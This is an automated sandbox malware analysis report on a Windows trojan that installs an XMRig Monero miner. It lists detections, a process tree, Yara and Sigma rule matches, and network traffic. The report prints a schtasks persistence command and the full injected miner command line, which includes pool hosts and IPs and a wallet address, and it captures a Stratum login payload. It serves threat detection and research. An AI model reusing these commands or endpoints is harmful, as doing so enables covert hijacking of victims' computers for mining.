Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report pcNCraWcRk

Overview

General Information

Sample Name:pcNCraWcRk (renamed file extension from none to exe)
Analysis ID:513056
MD5:0958fa69ba0e6645c42215c5325d8f76
SHA1:800666827e118ce78aef55c47864512ef9d3b7a6
SHA256:1b0c9f3f22d25cd518e480798ee44e8876107b2d37b2e92997c039d4a6c69db1
Tags:exetrojan
Infos:

Most interesting Screenshot:

Detection

BitCoin Miner Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected BitCoin Miner
Sigma detected: Xmrig
Writes to foreign memory regions
Found strings related to Crypto-Mining
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Detected Stratum mining protocol
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Creates driver files
Dropped file seen in connection with other malware
Sigma detected: Conhost Parent Process Executions
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • pcNCraWcRk.exe (PID: 1380 cmdline: 'C:\Users\user\Desktop\pcNCraWcRk.exe' MD5: 0958FA69BA0E6645C42215C5325D8F76)
    • conhost.exe (PID: 612 cmdline: 'C:\Windows\System32\conhost.exe' 'C:\Users\user\Desktop\pcNCraWcRk.exe' MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 4564 cmdline: 'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 6456 cmdline: schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe' MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • cmd.exe (PID: 5140 cmdline: 'cmd' cmd /c 'C:\Users\user\AppData\Local\Temp\services64.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • services64.exe (PID: 6756 cmdline: C:\Users\user\AppData\Local\Temp\services64.exe MD5: 0958FA69BA0E6645C42215C5325D8F76)
          • conhost.exe (PID: 5952 cmdline: 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe' MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • explorer.exe (PID: 6784 cmdline: C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100 MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • services64.exe (PID: 3496 cmdline: C:\Users\user\AppData\Local\Temp\services64.exe MD5: 0958FA69BA0E6645C42215C5325D8F76)
    • conhost.exe (PID: 5252 cmdline: 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe' MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • sihost64.exe (PID: 5264 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe' MD5: 2497F634A80476AE2EAE956D8B84528E)
        • conhost.exe (PID: 5932 cmdline: 'C:\Windows\System32\conhost.exe' '/sihost64' MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • explorer.exe (PID: 6764 cmdline: C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100 MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000012.00000000.782826325.0000000140753000.00000040.00000001.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    00000011.00000000.728856594.0000000140753000.00000040.00000001.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      00000011.00000000.723918666.0000000140753000.00000040.00000001.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        00000012.00000000.728904022.0000000140753000.00000040.00000001.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          00000009.00000002.847002769.000002C950221000.00000004.00000001.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            Click to see the 106 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            17.0.explorer.exe.140000000.12.unpackPUA_WIN_XMRIG_CryptoCoin_Miner_Dec20Detects XMRIG crypto coin minersFlorian Roth
            • 0x4d6674:$x1: xmrig.exe
            • 0x4d6560:$x2: xmrig.com
            • 0x4d6638:$x2: xmrig.com
            17.0.explorer.exe.140000000.12.unpackPUA_Crypto_Mining_CommandLine_Indicators_Oct21Detects command line parameters often used by crypto mining softwareFlorian Roth
            • 0x457915:$s01: --cpu-priority=
            • 0x45726d:$s05: --nicehash
            17.0.explorer.exe.140000000.12.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
            • 0x4617f1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
            17.0.explorer.exe.140000000.12.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              17.0.explorer.exe.140000000.2.unpackPUA_WIN_XMRIG_CryptoCoin_Miner_Dec20Detects XMRIG crypto coin minersFlorian Roth
              • 0x4d6674:$x1: xmrig.exe
              • 0x4d6560:$x2: xmrig.com
              • 0x4d6638:$x2: xmrig.com
              Click to see the 192 entries

              Sigma Overview

              Bitcoin Miner:

              barindex
              Sigma detected: XmrigShow sources
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100 , CommandLine: C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100 , CommandLine|base64offset|contains: "+~~), Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe', ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 5952, ProcessCommandLine: C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100 , ProcessId: 6784

              System Summary:

              barindex
              Sigma detected: Conhost Parent Process ExecutionsShow sources
              Source: Process startedAuthor: omkar72: Data: Command: 'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe', CommandLine: 'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Windows\System32\conhost.exe' 'C:\Users\user\Desktop\pcNCraWcRk.exe', ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 612, ProcessCommandLine: 'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe', ProcessId: 4564

              Jbx Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Multi AV Scanner detection for submitted fileShow sources
              Source: pcNCraWcRk.exeVirustotal: Detection: 64%Perma Link
              Source: pcNCraWcRk.exeMetadefender: Detection: 31%Perma Link
              Source: pcNCraWcRk.exeReversingLabs: Detection: 81%
              Antivirus / Scanner detection for submitted sampleShow sources
              Source: pcNCraWcRk.exeAvira: detected
              Multi AV Scanner detection for domain / URLShow sources
              Source: xmr.givemexyz.inVirustotal: Detection: 15%Perma Link
              Antivirus detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeAvira: detection malicious, Label: TR/Agent.ywcqa
              Source: C:\Users\user\AppData\Local\Temp\services64.exeAvira: detection malicious, Label: TR/Agent.wbqui
              Multi AV Scanner detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Local\Temp\services64.exeVirustotal: Detection: 64%Perma Link
              Source: C:\Users\user\AppData\Local\Temp\services64.exeMetadefender: Detection: 31%Perma Link
              Source: C:\Users\user\AppData\Local\Temp\services64.exeReversingLabs: Detection: 81%
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeMetadefender: Detection: 48%Perma Link
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeReversingLabs: Detection: 82%

              Bitcoin Miner:

              barindex
              Yara detected Xmrig cryptocurrency minerShow sources
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.conhost.exe.2c960a01248.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.conhost.exe.2c960f01280.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.conhost.exe.2c960f01280.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.conhost.exe.2c960a01248.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000012.00000000.782826325.0000000140753000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.728856594.0000000140753000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.723918666.0000000140753000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000000.728904022.0000000140753000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.847002769.000002C950221000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000000.744667827.0000000140753000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.726457226.0000000140753000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.849031612.000002C960EA6000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.732288392.000002A7830D1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.712169070.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.719362766.0000000140753000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000000.825932798.0000000140753000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000000.713121937.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000000.715770261.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000000.769937970.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.724751295.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000000.724515509.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000000.704591182.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.717951007.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000003.719582086.000002A79BBD0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.704736312.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.713985115.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.708825337.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.716519488.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.706517358.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.721988497.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000000.797286728.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000000.727173943.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000000.729811300.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.709450089.000002C968F90000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.717098920.000002C968F90000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.702282973.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000000.721557142.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.710365911.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.708284013.000002C968F90000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000000.710976279.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000000.706240409.0000000140000000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.847850368.000002C9604A6000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 5252, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 5952, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6784, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6764, type: MEMORYSTR
              Yara detected BitCoin MinerShow sources
              Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 5252, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 5952, type: MEMORYSTR
              Found strings related to Crypto-MiningShow sources
              Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmpString found in binary or memory: stratum+tcp://
              Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmpString found in binary or memory: cryptonight/0
              Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmpString found in binary or memory: stratum+tcp://
              Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmpString found in binary or memory: -o, --url=URL URL of mining server
              Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
              Source: conhost.exe, 00000009.00000002.847002769.000002C950221000.00000004.00000001.sdmpString found in binary or memory: FileDescriptionXMRig miner.
              Detected Stratum mining protocolShow sources
              Source: global trafficTCP traffic: 192.168.2.4:49763 -> 198.23.214.117:8080 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"","pass":"","agent":"xmrig/6.15.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}}.
              Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: conhost.exe, 00000009.00000002.847420069.000002C9505A6000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000000.688676721.000002A7830D1000.00000004.00000001.sdmp, WR64.sys.9.dr

              Networking:

              barindex
              System process connects to network (likely due to code injection or exploit)Show sources
              Source: C:\Windows\explorer.exeNetwork Connect: 198.23.214.117 144Jump to behavior
              Source: C:\Windows\explorer.exeDomain query: xmr.givemexyz.in
              Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
              Source: global trafficTCP traffic: 192.168.2.4:49763 -> 198.23.214.117:8080
              Source: conhost.exe, 00000009.00000002.847420069.000002C9505A6000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000000.688676721.000002A7830D1000.00000004.00000001.sdmp, WR64.sys.9.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
              Source: conhost.exe, 00000009.00000002.847420069.000002C9505A6000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000000.688676721.000002A7830D1000.00000004.00000001.sdmp, WR64.sys.9.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
              Source: conhost.exe, 00000009.00000002.847420069.000002C9505A6000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000000.688676721.000002A7830D1000.00000004.00000001.sdmp, WR64.sys.9.drString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
              Source: conhost.exe, 00000009.00000002.847420069.000002C9505A6000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000000.688676721.000002A7830D1000.00000004.00000001.sdmp, WR64.sys.9.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0
              Source: conhost.exe, 00000001.00000002.685200138.0000025F60DC1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmpString found in binary or memory: https://xmrig.com/benchmark/%s
              Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
              Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmpString found in binary or memory: https://xmrig.com/wizard
              Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmpString found in binary or memory: https://xmrig.com/wizard%s
              Source: unknownDNS traffic detected: queries for: xmr.givemexyz.in

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 17.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 9.2.conhost.exe.2c960a01248.6.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 18.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 17.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
